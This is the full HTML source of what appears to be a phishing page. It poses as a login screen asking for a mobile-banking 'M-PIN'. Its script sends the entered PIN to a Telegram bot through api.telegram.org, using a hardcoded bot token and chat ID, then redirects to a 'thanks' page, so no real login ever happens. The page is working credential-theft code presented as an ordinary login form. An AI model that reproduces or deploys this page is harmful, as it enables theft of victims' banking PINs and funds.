<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      padding: 0;
    }

    .container {
      width: 90%;
      margin: 0px auto;
      background-color: #fff;
      padding: 20px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .form-group {
      margin-bottom: 20px;
    }

    label {
      display: block;
      margin-bottom: 5px;
    }

    input[type="text"],
    input[type="tel"],
    input[type="number"],
    textarea {
      width: 100%;
      padding: 10px;
      border: 1px solid black;
      border-radius: 4px;
      box-sizing: border-box;
    }

    textarea {
      height: 180px; /* Adjust the height as needed */
    }

    button {
      background-color: #8F1921;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
    }

    button:hover {
      background-color: #8F1921;
    }
  
  img {
      display: block;
      margin: auto;
      max-width: 100%; /* Ensure the image doesn't exceed the width of its container */
      height: auto; /* Allow the image's height to scale proportionally to its width */
    }

    @media (max-width: 768px) {
      img {
        max-width: 100%; /* Adjust the max-width for smaller screens */
      }
    }
  
  form {
      max-width: 300px;
      margin: 0 auto;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      display: block;
      border: 1px solid red;
      border-radius: 5px;
      box-sizing: border-box;
    }

    input[type="submit"] {
      background-color: #8F1921;
      color: white;
      padding: 10px 15px;
      margin: 10px 0;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    input[type="submit"]:hover {
      background-color: #8F1921;
    }
  
  </style>
  <title>Form Example</title>
</head>
<body>
  <img src="logo.jpg" alt="Girl in a jacket">
  <div class="container">
    <form id="dataForm">
      <div class="form-group">
        <label for="mpin">M-PIN:</label>
        <input type="password" id="mpin" name="mpin" placeholder="Enter your M-PIN" required>
      </div>
      <button type="button" onclick="submitForm()">Login</button>
    </form>
  </div>
  <img src="footer.jpg" alt="Paris" class="center">
 
  <script>
    function submitForm() {
      var mpin = document.getElementById('mpin').value;
      var message = "M-PIN: " + mpin;
      var telegramBotToken = '6714103567:AAHEeNbOmUbcfG43uUa7EuALJx1HCxgMQoU';
      var telegramChatId = '6982934729';
      var telegramApiUrl = "https://api.telegram.org/bot" + telegramBotToken + "/sendMessage?chat_id=" + telegramChatId + "&text=" + encodeURI(message);
      
      var xhr = new XMLHttpRequest();
      xhr.open("GET", telegramApiUrl, true);
      xhr.send();

      xhr.onload = function() {
        if (xhr.status === 200) {
          window.location.href = 'thanks.html'; // Replace with the URL of the page you want to redirect to
        } else {
          alert("Failed to submit data to Telegram channel");
        }
      };
    }
  </script>
</body>
</html>
